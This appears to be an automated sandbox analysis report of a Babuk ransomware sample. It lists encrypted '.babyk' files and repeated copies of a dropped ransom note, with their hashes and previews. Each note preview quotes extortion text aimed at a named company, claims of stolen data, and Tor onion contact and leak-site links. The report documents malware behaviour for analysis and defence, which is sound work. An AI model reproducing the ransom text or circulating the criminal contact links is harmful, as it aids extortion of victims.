                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\Preferred.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):192
                                                                            Entropy (8bit):6.75986020684142
                                                                            Encrypted:false
                                                                            SSDEEP:3:MElvFlQwuN9Hx4nPwi2lz7kVdiUgdWnmQ6mS/TCGQPluW1CllmUxNvEEn:MElru3wGydQd4mQ6uGDl+0vtn
                                                                            MD5:BB22BCD4FC88E42C537314E6114AA234
                                                                            SHA1:B2EDB57CB63D3808540FE1236A67C998238C7654
                                                                            SHA-256:9C4011FB8321C76F2387AB7BE16000527290FF9CA22D6BC9E39358AF61BDEC17
                                                                            SHA-512:9FB8A79FE1753E93ED0B517794ABBA2C073B1E5B8E24897EE39C1DFC4D9C0F63595949ADFF21CFB07F662FBC340A9FA6615D279C2A7087A503C03ABA5DDF464C
                                                                            Malicious:false
                                                                            Preview: ......._...B....\.#.......=.I.....Ub...Iu...{...u....M3...z[.C...I8.+.i.`..I%.Ap.....~..N8w&..8.w{.C.Sq..Q..y_7..#"...AY....N?T%../.e.d@...l.(.P..Ii.t.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\de8c058c-b2d1-4c8c-8859-191fc05b8339.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):636
                                                                            Entropy (8bit):7.565733578685657
                                                                            Encrypted:false
                                                                            SSDEEP:12:p3RHoMPmNdAWmdSwyT3BmU3QH2lYP5Myzi5559I3RFH+v+V1LIZeD:p3R1WIy1mU3QWlgJza5rI3RkG1LIM
                                                                            MD5:3D81C9998CF7C2AEBD6965123810B2C9
                                                                            SHA1:64A8F56977C40E9D7DC74004DED104E7EB3CDDC9
                                                                            SHA-256:05B82A029FE8C400035B583A31028953DE1103B6D76F241F024DA9238841357B
                                                                            SHA-512:5867A8B12C3DC12F94F8E8AF807832DCDA5A8B61AEBA3174BD57A43B2DBA7AEC4CD548D2EDD0AD257EDC0BF309185AFD8D7A78C05CD5225D68FFA6E4C6E85012
                                                                            Malicious:false
                                                                            Preview: ..Z^..G[..H.V...91.P/..^....]....xbka.4z..xr..C...i.BS...Pn.d.....Vq...Gb..J....6O8~..p_....L..WZ..t1Eg........NWR.u..h.......Tt^..'6~x.. ..e..m._sp..J%...R...x...8.....a{.......D......S.E-X...AD..`.I(....Pz.3X.OB....nj..{m...9.UM:.V,^..O:o_...+#...#.bq.l..[......`..(K..#.P-.O.*..H..W#.dlG.B..=d...1...r....m{.}/.!o"i....L.;...?^:..v..Tk.%......{.s.Kt.#).Zg..~.0s....M.br}`..V.A>j.@.....U0....~..f.*;-.0...y.{.J.....l.w..n.P.KMK.J.U.8...).8.....p.2.\ DL..Q...).....O..U2j.J...ien. ..=2.!..#.XtL.<..c.....nP.!F..J....q..h.K.....'.{..+.. .W...T...6t..}L.A.{............choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Protect\SYNCHIST.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):244
                                                                            Entropy (8bit):6.969431575627101
                                                                            Encrypted:false
                                                                            SSDEEP:6:oiosrq0dUed2x7Bcjt6sjHD0g+R6j933NfxACqg20vtn:oiLixtUvzj9HNfGdgZ
                                                                            MD5:99B88D05B47FBE30D821406164E4DAE0
                                                                            SHA1:F20C9A0A69A5F5F67405585CF413CE7AB59D1EC8
                                                                            SHA-256:E67AE34EE74FCF8900EAB3DF948B3FAD5F67FA53DB3B15B17194F4D6955C465B
                                                                            SHA-512:FFC64128FFDFE4B545A7AD3BCA98DFC92B5A3189A38576A2134CB6616D1DB85FC98912BEDE28E08C4D44200DD0F275A05A8C677651C594DDC5BFF46E7A8CFA9F
                                                                            Malicious:false
                                                                            Preview: 1s..<.....X...u.+8....O..|X..d!..........J.{.d.......J<u:.}...k...)yXz........[[..W.?.".^...8M/..x&..|...e....h.,.l...[wc<'..9..}."g&....R....)}..D.P..v.:.NEs.Rw..s...S.pJ.Qp...c...I.....+....-I.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Speech\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Spelling\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\default.acl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):170
                                                                            Entropy (8bit):6.55912424529072
                                                                            Encrypted:false
                                                                            SSDEEP:3:atulLs5RkwMRHRbiwjixcxdkQH5Z1zpCWN6LYShKKDNcnl+UxNvEEn:a8lK4H0jKxD1zBZShKKql+0vtn
                                                                            MD5:A5B6C6497DCD8460545351EDE9A67940
                                                                            SHA1:445CC70395A09A400154226B61ADE0DC97F5904D
                                                                            SHA-256:E7DD2F27567CA88DD7B876AB749CCEFEE7F9E38D74A78F26F610A3E58A4899E4
                                                                            SHA-512:0EF441BC5CAB1D80CF238DB238385CC63E06D7555B6EFF3CC6B83F74398F68D63E3A4F39497FCE8EE9DF1EE4352075B7A35E0A2CC815DB24F2D4478D0BC60C3B
                                                                            Malicious:false
                                                                            Preview: .8.....7.K.f\..2....m....@.#5x(N.....3..p......&.`.:..6...Q...2..k8.`.a?..@.^8do..k...Ab..\]..M.....-.D..-n...v}......f.<59h......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\default.dic.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):170
                                                                            Entropy (8bit):6.604132977375446
                                                                            Encrypted:false
                                                                            SSDEEP:3:ullpPivbKiLf+WD5k+kjVIeE9vzMvsYeNDa+pOU1DUDi9nWvKmUxNvEEn:u/4vuirpD0IeCgvSnEU1DU+FWSm0vtn
                                                                            MD5:31110B675C4005BBD9106404B465EB7B
                                                                            SHA1:3925C2506DEBEF08C323CEEAD880D61ED0069BF8
                                                                            SHA-256:5BF62B73E3E480F3A8875056FEC43B1B526CFEC431302B82E2481FEC7543892D
                                                                            SHA-512:D0AD2DC83A6A839BE35FC3B08C66535B7CC5801063129FF7471D2590A901B36BEBC57E5C0CF6D5DCD7AE839A815382868BC4D6F35BBA59E3AFE0DDB89933739B
                                                                            Malicious:false
                                                                            Preview: k$......74.....P....).s.BE.Z.c1.."0.........Vza#..=xY...`y.z..h..L.nb.R;....U.p..f.E..}9Ag..U..(.FCL.....*..;...M.q..K...f.......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\default.exc.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):170
                                                                            Entropy (8bit):6.673641486610488
                                                                            Encrypted:false
                                                                            SSDEEP:3:FTHP4GTn18C4bRmy49SJ32WFrUgK9rPodojj3oGEdB3LUxNvEEn:pH185VJ32C/KTgL0vtn
                                                                            MD5:DF3A344C3CD6AF7BFBE32B036AF769BB
                                                                            SHA1:593041B3B91B83F390F7003D138E98A8AB1E9E3D
                                                                            SHA-256:A2811301472E35F1B6055553FAD4989295E9D755662E4BE2966C4422A6D4698C
                                                                            SHA-512:1A5FF0D66CCC24244670F888E5F894A949BCEE982DE853C876E651E9786BA5E83CABE72CCDED9CE6FD7B611419EFAEC999B65484A4095F1936BB47BBB4320881
                                                                            Malicious:false
                                                                            Preview: * .....<.~&..|.*...a..O.j.Z....|.M.....@.x.W.g..7.C.4f.`A._.,.)C.J....\t.l...o.R.m.....K1....G.KIE..P..d7=rw.M3.m>L....~.!...........choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\AppContainerUserCertRead.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.598614631551907
                                                                            Encrypted:false
                                                                            SSDEEP:3:tli6aS9tuVaS7vBAYYee8qenq0r1w+39jwkerH/owTcFmbltmUxNvEEn:yYuVh+YPnnN1L3iker1920vtn
                                                                            MD5:177644055FDE7E6866602EBA69398FCC
                                                                            SHA1:FE187D8C44560275A1A62B0DDC439B8E3A073029
                                                                            SHA-256:229954336EE2A992ADCE845E4FD71911245C0D61D46CA1F1208EB2B4ACC161D6
                                                                            SHA-512:AB6ECC70F9B8822FAD09694225BCA22E864DDD16604A7274B0CB1F50FA69A8777EA48370C974910D081B0EA802243FA33F0D0BD26F341A16070A6226453828EB
                                                                            Malicious:false
                                                                            Preview: ......_..cD.....>mJ...iB..p..~...^8.D..... b+.E.Y'...:..[.o.@.%,......dx.....I.x....m.-...P..&.mF.y.i.;N.+Q..%.....X9.{.{^..I.C.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):188
                                                                            Entropy (8bit):6.689232219262426
                                                                            Encrypted:false
                                                                            SSDEEP:3:Jq0xqKDLP5uLXqJ3ryIy1BmjaArxP5cI9IBU+6qxTtSQL0VqA2W9UxNvEEn:JPxqceXC9HuC3jIWzg/LNAB90vtn
                                                                            MD5:E974E74F896B663566EF65E3F4AEF0D2
                                                                            SHA1:064871D8474517FB8CCD806C7B47579F13A63119
                                                                            SHA-256:45DF8152D631DFDA734BAF8226311882849E293AD3C1C13723E9E427AC789E76
                                                                            SHA-512:619320EBDB646E71049AEC5BD43BEFE1AC6649EA6A4542DB81538EE381686E2C474DADEBBC469C2ECAB9B4AFE7BC74010C7AB79F88FD71F7813660EBD23DDAEB
                                                                            Malicious:false
                                                                            Preview: .?n..w...Do......0....../........R.Nw..\..(...)..$.....>e......-...w..X..011.}.&*v..G.....3$./^.......&H..%...7..k.j./..rr1..`8..,...n...Q..f.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Microsoft\UProof\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Vault\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Contacts\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
